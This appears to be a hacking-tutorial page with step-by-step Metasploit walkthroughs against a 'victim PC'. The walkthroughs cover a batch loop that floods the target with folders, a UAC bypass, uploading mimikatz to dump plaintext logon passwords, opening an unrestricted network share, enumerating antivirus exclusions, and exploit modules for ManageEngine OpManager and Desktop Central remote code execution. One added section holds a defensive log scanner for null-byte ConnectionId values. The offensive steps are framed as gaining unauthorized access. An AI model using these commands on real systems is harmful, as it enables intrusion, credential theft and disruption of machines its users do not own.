How to Create Unlimited Folders on a Remote Victim PC using Metasploit

Open leafpad and type the following code.

:loop
md %random%
goto loop

Now save it as a batch file.


Now use the upload command to send the batch file to the target system.


Now type shell to enter the victim's command prompt and execute the batch file. It will create an unlimited number of blank folders on the victim PC.


How to Gain Unauthorized Access to a Remote PC using Metasploit

First Hack the Victim PC Using Metasploit (Tutorial How to Hack Remote PC)

Once you have a remote shell with Metasploit, use the Bypass UAC module, set the session number and run the exploit.

use exploit/windows/local/bypassuac_injection
msf exploit (bypassuac_injection)>set session 1

msf exploit (bypassuac_injection)>exploit


mimikatz is a tool to check Windows security. It is well known for extracting plaintext passwords, hashes, PIN codes and Kerberos tickets from memory. mimikatz can also perform pass-the-hash and pass-the-ticket, or build Golden tickets.

First, download the Windows version of mimikatz from here and use the upload command to send the file to the target system.


Type the following command to check the privilege:
privilege::debug

Now type the following command to get the users' passwords in plain text.
sekurlsa::logonPasswords


Using the "net help share" command you will see that the syntax is as follows:

net share raj=(Drive name):  /GRANT:Everyone,FULL


Open the Start, Run dialog box and enter the path of the shared folder using the format \\192.18.0.101


It will prompt you for a username and password; type them, and then click OK.


Now you can access the shared folder. Below is the screenshot for reference.

How to Gather Antivirus Information from a Remote Victim PC using Metasploit

First Hack the Victim PC Using Metasploit (Tutorial How to Hack Remote PC)

This module will enumerate the file, directory, process and extension-based exclusions from supported AV products, which currently includes Microsoft Defender, Microsoft Security Essentials/Antimalware, and Symantec Endpoint Protection.

Exploit Targets
Windows 7

Requirement
Attacker: Kali Linux
Victim PC: Windows 7


Open a Kali terminal and type msfconsole


Now type use post/windows/gather/enum_av_excluded
msf exploit (enum_av_excluded)>set lhost 192.168.0.105 (IP of Local Host)
msf exploit (enum_av_excluded)>set session 1
msf exploit (enum_av_excluded)>exploit

Hack Remote Windows PC using ManageEngine OpManager Remote Code Execution

This module exploits a default credential vulnerability in ManageEngine OpManager, where a default hidden account "IntegrationUser" with administrator privileges exists. The account has a default password of "plugin" which cannot be reset through the user interface. By logging in and abusing the default administrator's SQL query functionality, it is possible to write a WAR payload to disk and trigger an automatic deployment of this payload. This module has been tested successfully on OpManager v11.5 and v11.6 for Windows.

Exploit Targets
Windows 7
ManageEngine OpManager v11.6


Requirement
Attacker: Kali Linux
Victim PC: Windows 7


Open a Kali terminal and type msfconsole


Now type use exploit/windows/http/manage_engine_opmanager_rce
msf exploit (manage_engine_opmanager_rce)>set lhost 192.168.0.106 (IP of Local Host)
msf exploit (manage_engine_opmanager_rce)>set rhost 192.168.0.104
msf exploit (manage_engine_opmanager_rce)>exploit


Hack Remote Windows PC using ManageEngine Desktop Central 9 FileUploadServlet ConnectionId Vulnerability

This module exploits a vulnerability found in ManageEngine Desktop Central 9. When a 7z file is uploaded, the FileUploadServlet class does not check the user-controlled ConnectionId parameter. This allows a remote attacker to inject a null byte at the end of the value to create a malicious file with an arbitrary file type, and then place it under a directory that allows server-side scripts to run, which results in remote code execution under the context of SYSTEM. Please note that by default, some ManageEngine Desktop Central versions run on port 8020, but older ones run on port 8040. Also, using this exploit will leave debugging information produced by FileUploadServlet in file rdslog0.txt. This exploit was successfully tested on version 9, build 90109 and build 91084.
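On the defensive side, a null byte in the ConnectionId value shows up in web access logs as %00, or as %2500 when it has been double-encoded. The following is an added example, not code from the original page, ManageEngine or Metasploit. It assumes a combined-style access log; the /upload path, the fileName parameter and the sample lines are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, unquote

# Constructed sample lines (combined-log style). The request path and the
# fileName parameter are assumptions, not the product's real URL layout.
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Jan/2016:10:00:01 +0000] "POST /upload?connectionId=1234&fileName=a.7z HTTP/1.1" 200 12',
    '192.0.2.66 - - [01/Jan/2016:10:03:44 +0000] "POST /upload?ConnectionId=abc%00&fileName=a.7z HTTP/1.1" 200 12',
    '192.0.2.66 - - [01/Jan/2016:10:03:50 +0000] "POST /upload?connectionid=abc%2500 HTTP/1.1" 200 12',
    '192.0.2.10 - - [01/Jan/2016:10:05:00 +0000] "GET /index.html?id=%00 HTTP/1.1" 200 512',
]

REQUEST_RE = re.compile(r'"(?:GET|POST|PUT) (\S+) HTTP/[\d.]+"')


def fully_unquote(value, max_rounds=3):
    """Percent-decode repeatedly so double-encoded bytes (%2500) are exposed."""
    for _ in range(max_rounds):
        decoded = unquote(value, encoding="latin-1")
        if decoded == value:
            break
        value = decoded
    return value


def suspicious_connection_ids(lines):
    """Return (client_ip, raw_value) for ConnectionId values that decode to a
    NUL or other control character."""
    hits = []
    for line in lines:
        match = REQUEST_RE.search(line)
        if not match:
            continue  # not a request line we understand
        query = urlsplit(match.group(1)).query
        # Split by hand so the raw, still-encoded value is kept for the report.
        for pair in query.split("&"):
            name, _, raw = pair.partition("=")
            if name.lower() != "connectionid":
                continue
            decoded = fully_unquote(raw)
            if any(ord(ch) < 0x20 or ord(ch) == 0x7F for ch in decoded):
                hits.append((line.split(" ", 1)[0], raw))
    return hits


if __name__ == "__main__":
    for ip, raw in suspicious_connection_ids(SAMPLE_LOG):
        print(f"suspicious ConnectionId from {ip}: {raw}")
```

A hit is a reason to review rdslog0.txt, which the module description names as holding the servlet's debugging output, for the same time window.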

Exploit Targets
Windows 7
ManageEngine Desktop Central 9

Requirement
Attacker: Kali Linux
Victim PC: Windows 7


Open a Kali terminal and type msfconsole


Now type use exploit/windows/http/manageengine_connectionid_write
msf exploit (manageengine_connectionid_write)>set lhost 192.168.1.33 (IP of Local Host)
msf exploit (manageengine_connectionid_write)>set rhost 192.168.1.4
msf exploit (manageengine_connectionid_write)>exploit